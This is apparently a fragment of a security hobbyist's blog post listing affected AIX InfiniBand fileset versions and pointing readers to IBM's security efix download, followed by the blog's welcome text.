devices.common.IBM.ib.rte 6.1.8.0 6.1.8.15
devices.common.IBM.ib.rte 7.1.0.0 7.1.0.21
devices.common.IBM.ib.rte 7.1.1.0 7.1.1.18
devices.common.IBM.ib.rte 7.1.2.0 7.1.2.15

You must upgrade your system, or install the fix:


ftp://aix.software.ibm.com/aix/efixes/security/infiniband_fix.tar

Rock it!

Welcome

Welcome to my blog,

Its purpose is to share the hacks, experiences and skills I have in computing in general, in security, and then a bit of everything and anything.

Enjoy your visit.